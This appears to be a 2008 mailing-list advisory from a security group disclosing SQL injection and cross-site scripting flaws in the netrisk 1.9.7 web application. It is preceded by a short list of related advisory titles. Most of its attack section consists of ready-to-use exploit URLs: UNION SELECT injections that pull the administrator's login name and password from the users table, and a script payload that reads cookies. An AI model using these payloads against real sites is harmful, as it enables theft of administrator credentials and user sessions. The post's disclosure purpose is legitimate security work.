Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

sysHotel On Line Remote File Disclosure Vulnerability.

Million Dollar Script 2.0.14 Remote File Disclosure Vulnerability.

SocialURL Login Page Cross-Site Scripting

OneCMS Vulnerabilities

From:	hadihadi_zedehal_2006_(at)_yahoo.com <hadihadi_zedehal_2006_(at)_yahoo.com>
Date:	08.01.2008
Subject:	netrisk 1.9.7 Multiple Remote Vulnerabilities (sql injection/xss)

          
  ####################################################################
  #                                                                  #
  #  ...:::::netrisk 1.9.7 Multiple Remote Vulnerabilities::::....  #
  #                        (sql injection/xss)                       #           
  ####################################################################

Virangar Security Team

www.virangar.org
www.virangar.net

--------
Discoverd By : virangar security team
(hadihadi)
---------------------------------
special tnx to:MR.nosrati,black.shadowes,MR.hesy,satan,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
------------------------------------

vlues:

1.sql injection:
get admin login name:
http://site.com/patch/index.php?page=profile&pid=-1/**/union/**/select/**/1,
2,login,4,5,6,7,8,9,10,11/**/from/**/users/**/where/**/id=1/*
---
get admin pass:
http://site.com/patch/index.php?page=profile&pid=-1/**/union/**/select/**/1,
2,pass,4,5,6,7,8,9,10,11/**/from/**/users/**/where/**/id=1/*
########################
2.xss:
http://site.com/patch/index.php?page=<script>alert(document.
cookie)</script>

########################
NetRisk contains of  other sql injecton/xss/LFI  bugs in other pages ;)